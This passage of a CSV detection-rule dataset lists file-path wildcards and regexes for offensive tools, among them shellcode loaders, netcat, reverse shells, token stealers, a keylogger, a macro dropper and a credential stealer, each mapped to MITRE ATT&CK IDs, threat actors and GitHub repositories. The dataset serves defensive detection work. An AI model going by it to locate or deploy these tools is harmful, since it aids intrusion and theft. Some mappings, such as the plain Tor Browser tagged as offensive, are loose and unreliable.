writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19353" "*\tikispawn.xml*",".{0,1000}\\tikispawn\.xml.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent 
Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19354" 
"*\TikiTorch\Aggressor*",".{0,1000}\\TikiTorch\\Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19355" "*\TimeException.cpp*",".{0,1000}\\TimeException\.cpp.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","19356" "*\TimeException.exe*",".{0,1000}\\TimeException\.exe.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","19357" "*\TimeException-main*",".{0,1000}\\TimeException\-main.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","19358" "*\tinymet.exe*",".{0,1000}\\tinymet\.exe.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","19359" 
"*\tmp\dll-collection*",".{0,1000}\\tmp\\dll\-collection.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","19363" "*\Tmp\nc.exe*",".{0,1000}\\Tmp\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19364" "*\Tmp\netcat.exe*",".{0,1000}\\Tmp\\netcat\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19365" "*\tmp_payload.txt*",".{0,1000}\\tmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","19366" "*\Token grabber.dll*",".{0,1000}\\Token\sgrabber\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","19367" "*\TokenAssignor.exe*",".{0,1000}\\TokenAssignor\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19368" "*\TokenDump.cs*",".{0,1000}\\TokenDump\.cs.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19369" 
"*\TokenDump.exe*",".{0,1000}\\TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19370" "*\TokenDump.exe*",".{0,1000}\\TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19371" "*\TokenDump.sln*",".{0,1000}\\TokenDump\.sln.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19372" "*\TokenExfiltereter.cs*",".{0,1000}\\TokenExfiltereter\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","19373" "*\TokenFinder.py*",".{0,1000}\\TokenFinder\.py.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","19374" 
"*\Token-Impersonation.ps1*",".{0,1000}\\Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19375" "*\Token-Impersonation.ps1*",".{0,1000}\\Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","19376" "*\TokenPlayer.cpp*",".{0,1000}\\TokenPlayer\.cpp.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19377" "*\TokenPlayer.exe*",".{0,1000}\\TokenPlayer\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19378" "*\TokenPlayer\TokenPlayer\*",".{0,1000}\\TokenPlayer\\TokenPlayer\\.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19379" "*\tokenprivileges.c*",".{0,1000}\\tokenprivileges\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","19380" "*\tokenprivileges.o*",".{0,1000}\\tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","19381" "*\TokenStealing.exe*",".{0,1000}\\TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19382" "*\TokenStomp.exe*",".{0,1000}\\TokenStomp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19383" "*\TokenStomp.exe*",".{0,1000}\\TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common 
C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19384" "*\TokenUniverse.zip*",".{0,1000}\\TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","19385" "*\TokenUniverse\TokenUniverse.*",".{0,1000}\\TokenUniverse\\TokenUniverse\..{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","19386" "*\Tokenvator\*",".{0,1000}\\Tokenvator\\.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","19387" "*\toms-server\keylog.txt*",".{0,1000}\\toms\-server\\keylog\.txt.{0,1000}","offensive_tool_keyword","peeping-tom","Remote 
keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","19388" "*\tools\DocLnk.exe*",".{0,1000}\\tools\\DocLnk\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","19389" "*\Tools\ResHacker.exe*",".{0,1000}\\Tools\\ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19391" "*\tor.exe*",".{0,1000}\\tor\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19392" "*\tor\hidden_service.*",".{0,1000}\\tor\\hidden_service\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","19393" "*\tor\onion_router.*",".{0,1000}\\tor\\onion_router\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","19394" "*\Tor\tor.exe*",".{0,1000}\\Tor\\tor\.exe.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","19395" "*\Tor\torrc*",".{0,1000}\\Tor\\torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","19396" "*\ToRat\cmd\*",".{0,1000}\\ToRat\\cmd\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19397" "*\ToRat\keygen\*",".{0,1000}\\ToRat\\keygen\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19398" "*\ToRat\torat_client\*",".{0,1000}\\ToRat\\torat_client\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19399" "*\ToRat\torat_server\*",".{0,1000}\\ToRat\\torat_server\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19400" "*\ToRat-master.zip*",".{0,1000}\\ToRat\-master\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19401" "*\TorBrowser*",".{0,1000}\\TorBrowser.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","19402" "*\torbrowser-install-*.exe *",".{0,1000}\\torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19403" "*\tor-browser-win32*.*",".{0,1000}\\tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19404" "*\tor-browser-win64*.*",".{0,1000}\\tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19405" "*\tor-static-windows-amd64.zip*",".{0,1000}\\tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19406" "*\TortoiseSVNHookScripts.cs*",".{0,1000}\\TortoiseSVNHookScripts\.cs.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","19407" "*\totalrecall.py*",".{0,1000}\\totalrecall\.py.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","19408" 
